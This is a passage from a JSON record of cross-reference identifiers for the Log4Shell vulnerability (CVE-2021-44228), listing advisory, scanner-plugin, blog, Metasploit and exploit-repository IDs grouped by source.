"E655806B-A2A8-5BCB-A30A-0120CA3E97A6", "E6E03693-50B8-5AB4-B766-8464A228BA02", "E9B21C59-ED98-5B3B-A993-F1C214F8796C", "EA1AF0D9-1E6E-5080-BB7C-9D6035795FFB", "EA3173CE-C426-5047-864A-480B1A30F235", "EA3C5D7E-0CC8-5AEC-8D7F-3C245A834DDA", "EA906824-9149-507D-893C-87A7FED8998B", "EB648301-A198-5E4A-A72E-9639ED09F6C9", "EC0987E2-0001-5D63-A5AF-09675A5915BD", "EC35769F-2EAD-5464-8F97-D90F768E1E2D", "EDDA4558-9527-5BDE-86E3-23DDD0BA5443", "EE01D764-5F14-5C0A-BD77-8E32854C5216", "EFD098FC-90C8-5665-98B7-79C96C6AEBAE", "F1D342BE-E1E0-5B33-A19B-E2EB9E3E7C80", "F1E9BE6D-4024-56FB-80BB-B10ED5889144", "F208D311-79CA-5A2C-AE81-591BA4D30750", "F2F2719B-7041-5D1A-A95A-7617360B1D08", "F32DF396-0485-5F43-8A52-31B8DD252790", "F388C84A-40DA-58BC-BE0A-74C7E1712C54", "F3A40027-6DB5-509C-81CF-473DE3BEF46E", "F4C136DE-892B-5921-8475-E30BD548DDBB", "F523E799-3659-532F-8EED-40AD7F79E752", "F594470D-2599-5B2E-B317-C9720581C07D", "F7994B92-2846-5644-8B68-EFB6DFB95ED2", "FB593988-2CFC-5828-8229-9274AC7B0F86", "FB65C479-F4E7-58BA-BC4A-AED04F10A11C", "FB83113C-AABD-5893-8DDE-332B57F4FDD4", "FD65F47A-0B60-5F08-BFC2-1ABD16F49781", "FE8572DF-42D4-521C-B3DC-4715C2F9240D", "FEFA5AE8-5C94-5174-B44C-AC52B9AEAEAD"]}, {"type": "hackerone", "idList": ["H1:1423496", "H1:1427589", "H1:1438393"]}, {"type": "hivepro", "idList": ["HIVEPRO:205916945365E4C9EB9829951A82295A"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20211215-01-LOG4J"]}, {"type": "ibm", "idList": ["08493CBA8B1A8F34C7786760C52C7997B8AE1C300A4CD3A03EEF9B528175E0E6", "11FEAADF6A94DFB6615A82EE0023D346C418ECD114C445A6BA52D50AA2C6FE0B", "1629CA1DFD389EEFF25556E8C9B707086E571E474449820E949D944C6EB994C3", "18578ECA481CB003C14A84CA7A47ACA060F579C24F4075A776AF26B575502960", "18A5E6C2581806177DE446AE26FCBC2EBB616C29B40041253F318FF51CE1AFB5", "1C6CC8129E7AEC5C314CCFD7570FC09548438820946E9774FD2E2410C0897958", "1CF787D3495FD84D3FB0E74685765A4270075CE576D888A960036582B4F83133", "23532FC7488A1E0A5525D86FA8B58841ED6086B69C02A7FBB104B3F98E2ED3CE", "2709A19D29B9047D230E570EBF5F26A53D322D557D88CBCFB480F1AFEEF6797C", "4204EAC341D63510AAFE13D5F22BA14E92396D43569176E371BFB452611D1A97", "4271B86469CFCE465E783BEC3C9F3EDD13D645F55A5BEB697F3A4FCF694E568B", "4AB0975E08BC56107FE408EAB5B5BE88E706B439236C7F566A37398C9C1E0CCB", "519FF26BE329CC59BFF47E2AAC0D4B73FCA35BCF836D736A007D121863323E8C", "53949D71EE0D6BBA6C433F4DE402EC6D1ED7AA7877C8B84C15AD5E27FFEBE24E", "53D2631E5E76894870663A2B4948D3A4F72BDEEDF8C87935B788F981BEE5852B", "58868A8A56E187AE7CFDC0168A9534F5C483AC0F042B7ADF09CCBE3D8A901101", "68F256DC5E144D5A2404101E56A66160645897F9BB7E8600047077C626B2FE43", "6CB020CE84694787BB12E05DCB6CC95C33681B735ED0D48ED68FF5A99DD1D7A4", "6FCF3A6897C9A1A085633762339E7EC8DFE631B6D2A160FA5D1ADBC3E11F92E1", "78F199BD0B7C851B9B51668C7C03C7066EA862D4D07B5141F8116EE923472533", "7E846C52FF7D26445DCFC4472B6BC7E4EEADFD45513EDDFC6C395E9B800F576B", "8191B5D601C7F186266C65C8DC79A0B94EDA45737524796672F9272DD3278F4E", "8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8", "8FA41F50A028003D6689B034A6CA3E840361D121B9F4B4350B17EAB4605438C4", "9D21714C8A46FFA3AB195D14E14C9E6854AE7C8D7E68CC48DA42B63AB322B14A", "9D675243F41B597AEE7EC01ACEA307E5B73DA85724CE286F50180E2EF0DDC2E8", "9E08A11DD23150C79E969A8FA933F7C903468F74CE144600AC32149CD9CCC3CD", "A6A496B2E032EDA1F9C9B0D3982C6A52B7D925C02D0F2EFE157394C4851AEBA7", "AA3BDAF8E33B6E3ED2F924A99C734FE82BC738F506CB900388E32E3FD4CCDA88", "AC1B4BF839D3912B4646DFB21DA46EFE78B9249D5C29B4FAB631753998720DBE", "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "CA111B4E9CA9EC240292C6D00FE0CF8C7559AC1453E3199BC3370D149FB11174", "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B"]}, {"type": "ics", "idList": ["ICSA-22-034-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "kaspersky", "idList": ["KLA12390", "KLA12392", "KLA12393"]}, {"type": "kitploit", "idList": ["KITPLOIT:134021490040098714", "KITPLOIT:144331229809700743", "KITPLOIT:1680589374755422772", "KITPLOIT:3188944951765917430", "KITPLOIT:3773942873037113539", "KITPLOIT:4125185526326677098", "KITPLOIT:4333067961180534072", "KITPLOIT:4654779182065061303", "KITPLOIT:5104415481503400470", "KITPLOIT:522409803487164759", "KITPLOIT:5734436811250397170", "KITPLOIT:5789499291738758939", "KITPLOIT:6422486000446318290", "KITPLOIT:6759391622067035795", "KITPLOIT:7976092996345827446", "KITPLOIT:8031680161397698025", "KITPLOIT:8148701901300660800", "KITPLOIT:8266451932034361580", "KITPLOIT:8945091038325456871"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/LOG4SHELL_SCANNER/", "MSF:EXPLOIT/MULTI/HTTP/LOG4SHELL_HEADER_INJECTION/"]}, {"type": "mmpc", "idList": ["MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "mscve", "idList": ["MS:CVE-2021-44228"]}, {"type": "msrc", "idList": ["MSRC:543F3A129A47F4B14FB170389908717B"]}, {"type": "mssecure", "idList": ["MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "ALA_ALAS-2021-1553.NASL", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_JDNI_LDAP_GENERIC.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_HTTP_HEADERS.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_TELNET.NBIN", "APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_IMAP.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "DEBIAN_DLA-2842.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "WEB_APPLICATION_SCANNING_113075"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165642"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630"]}, {"type": "redhat", "idList": ["RHSA-2022:0082", "RHSA-2022:0223"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", "RH:CVE-2021-45046", "RH:CVE-2021-45105"]}, {"type": "securelist", "idList": ["SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", "OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1"]}, {"type": "symantec", "idList": ["SMNTC-19793"]}, {"type": "talos", "idList": ["SAP"]}, {"type": "thn", "idList": ["THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:5BAE3325983F971D1108722C454FF9AB", "THN:5CB7AEBFFE369D293598A4FDBFDFCEE3", "THN:602D65D576B090BAC4B0C96998F8F922", "THN:668DE2C9CFD709125451AF8F3FE12E6C", "THN:686DDFA07B415C41BA7AB9B8970557EF", "THN:76D7572EDBE770410D6F0518DAD8B0AD", "THN:833B2B9623F1C64D20868B947E8BE4E0", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:933FE23273AB5250B949633A337D44E1", "THN:AFF2BD38CB9578D0F4CA96A145933627"]}, {"type": "threatpost", "idList": ["THREATPOST:050A36E6453D4472A2734DA342E95366", "THREATPOST:065F7608AC06475E765018E97F14998D", "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "THREATPOST:27C5AA551B5793DEA8848FB76DE52B32", "THREATPOST:34D98758A035C36FED68DDD940415845", "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:D098942E4435832E619282E1B92C9E0F"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02"]}, {"type": "ubuntu", "idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-44228"]}, {"type": "vmware", "idList": ["VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "zdt", "idList": ["1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37257"]}]}, "dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:7E872DA472DB19F259EC6E0D8CA018FF", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3"]}, {"type": "amazon", "idList": ["ALAS-2021-1553", "ALAS-2021-1554", "ALAS-2022-1580", "ALAS-2022-1601", "ALAS2-2021-1730", "ALAS2-2021-1731", "ALAS2-2021-1732", "ALAS2-2022-1739", "ALAS2-2022-1773", "ALAS2-2022-1806"]}, {"type": "amd", "idList": ["AMD-SB-1034"]}, {"type": "apple", "idList": ["APPLE:251C897D47AD6A2DB0B7E3792A81C425"]}, {"type": "arista", "idList": ["ARISTA:0070"]}, {"type": "atlassian", "idList": ["CRUC-8529", "FE-7368"]}, {"type": "attackerkb", "idList": ["AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:21AD0A36-A0AA-486B-A379-B47156286E9E", "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74", "AKB:484D6DEC-EFAF-46E7-ACF1-6CB13F63FC68", "AKB:B1318EAC-2E60-4695-B63B-2D10DAAA5B0E", "AKB:F2A441BA-2246-446C-9B34-400B2F3DD77B"]}, {"type": "avleonov", "idList": ["AVLEONOV:469525DB37AAC7A2242EE80C1BCBC8DB", "AVLEONOV:89C75127789AC2C132A3AA403F035902", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "cert", "idList": ["VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0936", "CPAI-2022-0042"]}, {"type": "checkpoint_security", "idList": ["CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:006B1DC6A817621E16EEB4560519A418", "CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "CISA:6C962B804E593B231FDE50912F4D093A", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33", "CISA:C491359F9996B7AF8A31AD01C810E384", "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2021-44228", "CISA-KEV-CVE-2022-22536"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-LOG4J-QRUKNEBD"]}, {"type": "citrix", "idList": ["CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cve", "idList": ["CVE-2021-3100", "CVE-2021-4104", "CVE-2021-4125", "CVE-2021-44228", "CVE-2021-44530", "CVE-2021-45046", "CVE-2022-0070", "CVE-2022-22532", "CVE-2022-22533", "CVE-2022-22536", "CVE-2022-23848", "CVE-2022-33915"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2842-1:95CB4", "DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-4104", "DEBIANCVE:CVE-2021-44228", "DEBIANCVE:CVE-2021-45046"]}, {"type": "exploitdb", "idList": ["EDB-ID:50590", "EDB-ID:50592"]}, {"type": "f5", "idList": ["F5:K19026212", "F5:K24554520", "F5:K32171392", "F5:K34002344"]}, {"type": "fedora", "idList": ["FEDORA:0A343304CB93", "FEDORA:548FD3102AB0", "FEDORA:59AA230A7074", "FEDORA:95A5B306879A", "FEDORA:A5A703103140"]}, {"type": "fortinet", "idList": ["FG-IR-21-245"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4"]}, {"type": "github", "idList": ["GHSA-3QPM-H9CH-PX3C", "GHSA-7RJR-3Q55-VV33", "GHSA-FP5R-V3W9-4333", "GHSA-J3CH-VJPH-8Q6V", "GHSA-J7C3-96RF-JRRP", "GHSA-JFH8-C2JP-5V3Q", "GHSA-MF4F-J588-5XM8", "GHSA-V57X-GXFJ-484Q", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "016A0841-D1FF-5056-B062-0D08FCE624CB", "0241DC13-63CB-580C-BDC6-78F8BB03567D", "024D29D3-309F-5B7F-B8C9-2AF149F9A213", "030066BA-6C48-5AD9-9EAF-11DECB6A3930", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "0420DA06-BC6E-5B30-8BA3-E30BDE351E15", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "066BA250-177D-5017-9AC2-6B948A465ABC", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0CEA12C7-97F6-5BF5-88FF-6797542A037F", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0D6ADE4E-8BA2-5BA9-94CB-ED90234A9B5C", "0E43C674-363B-53C2-8686-6F412A995AF4", "0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "1097EF60-FC77-5135-B92B-4A84B46FABAF", "11719BED-E629-5C79-944E-7E40BBFC460C", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "13542749-F70C-5BAA-A20C-8A464D612535", "1370FA0C-A273-5E82-9EEB-7E2E5628D23E", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "141F2E38-979B-50B5-B649-96785B255523", "14482532-2406-58DF-89FF-30B085015257", "149F99C3-6B62-5255-8DA6-A0370E6ED5F7", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16C11F1E-B5B4-508E-8238-6BF3458B34D3", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1B8CBBEC-5ABA-5792-8D2A-A51EB4CC6352", "1C354B89-0050-508B-98F4-B43CBD84F364", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27760EBF-2681-5AF4-B884-18C8BED5127A", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "2B297EB1-A602-5F7B-B21B-C34BC6EB4308", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "2F792C33-6CC6-58F1-9166-4DEA421DE2C3", "2F83846E-DF16-5074-98CB-01158DE1C6C6", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "31E7D7EA-2E1F-59D8-8BD7-81B8A4894F91", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "35A70212-DFFC-5B38-8294-2B835B8080DE", "371D4A15-51B5-520B-B31D-856E557695FD", "3734D8ED-657E-5585-B181-DE9BE2D84456", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3AAA878D-C72A-52A0-A5B6-0977BAF6F01D", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3DFE8091-03AE-565B-A198-BD509784502C", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "42098CCD-C708-53FC-B3CD-5A8356B69359", "423CC97A-8BDD-56B9-9449-FC05A902AEC1", "4288177C-C609-5D55-A845-D6785929AB4D", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "43CEFD04-EB9B-5765-AB94-8FF76127F1F6", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "4804958E-7699-5226-91C3-8110A4CBAB18", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "4A0D603B-6526-5D1E-BADC-55B4775C354B", "4B070EB0-B690-5547-8809-F1A697118957", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4C6A108D-3631-56AD-8C3B-9677A228693B", "4CB3AC5D-871A-50AC-9037-FF9B2CBD474A", "4DBC05D1-8178-5715-953D-61ECC89104F4", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F57CC9C-B908-544E-92E7-92A49DE89B00", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "52E35A88-6217-55CC-B812-4EE83CECD8EB", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "5644D9A0-3A8F-52F3-AE3E-300C79911A07", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "58ACC402-1947-5FE3-9D08-021A4EFEC48A", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B342AC3-2399-581E-BB6A-2EF19BC35B0C", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5CEF4882-D1D5-5861-944F-34E8868BF986", 